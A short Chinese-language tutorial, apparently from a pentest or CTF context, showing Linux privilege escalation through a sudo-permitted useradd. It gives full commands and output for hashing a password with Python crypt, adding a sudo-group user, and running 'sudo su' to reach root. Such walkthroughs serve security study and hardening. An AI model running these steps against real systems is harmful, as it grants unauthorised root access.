sudo配合useradd命令也是可以用来提权的。整体思路是添加一个组为sudo的用户,然后用这个新用户执行sudo su到root
首先看下useradd添加用户的几个必要条件,指定组,指定密码,useradd有这么几个参数可以使用
Usage: useradd [options] LOGIN
useradd -D
useradd -D [options]
Options:
-g, --gid GROUP name or ID of the primary group of the new account
-m, --create-home create the user's home directory
-p, --password PASSWORD encrypted password of the new account
-g指定组,-m指定home目录,登录需要一个默认的home目录。-p指定密码,这里的密码需要encrypted加密过。
步骤一:生成用户密码的密文,这里用python的crypt库来实现,这里123456是密码,hh随便指定,相当于盐
test@test:/etc/ppp$ python
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import crypt
import crypt
>>> crypt.crypt("123456","hh")
crypt.crypt("123456","hh")
'hhYwUmQRSuCZ.'
>>> exit
exit
Use exit() or Ctrl-D (i.e. EOF) to exit
>>> exit()
exit()
test@test:/etc/ppp$
步骤二:利用上面生成的密码密文配合sudo useradd加一个拥有sudo组的用户,此时就添加了一个test2的用户,密码是123456
test@test:/etc/ppp$ sudo /usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2
步骤三:跳到test2用户
test@test:/etc/ppp$ su test2
su test2
Password: 123456
$ id
id
uid=1003(test2) gid=27(sudo) groups=27(sudo)
步骤四:跳到root用户
$ sudo su
sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for test2: 123456
root@test:/etc/ppp#
提权到root